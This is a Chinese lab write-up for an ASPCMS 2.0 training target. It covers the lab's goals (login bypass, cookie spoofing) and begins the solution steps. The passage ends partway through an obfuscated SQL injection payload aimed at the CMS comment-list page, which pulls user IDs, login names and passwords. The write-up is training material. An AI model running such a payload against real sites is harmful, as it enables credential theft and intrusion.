靶场:
https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe
背景介绍
ASPCMS是完全开源的一套CMS建站系统,主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网站,一般的开发人员就能够使用本系统以最低的成本、最少的人力投入在最短的时间内架设一个功能齐全、性能优异的公司企业网站。ASPCMS是基于ASP+Access(sql2000)开发的网站内容管理系统。
实训目标
1.学习登录绕过、cookie欺骗的相关知识;
2.熟悉火狐插件cookies Manager使用;
3.对代码的相关知识了解;
解题方向
代码审计漏洞,cookie伪造绕过身份鉴别
解题思路:
1、打开网址,查看页面源码,发现目标使用aspcms2.0
2、百度aspcms2.0,发现存在注入漏洞,利用payload
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{p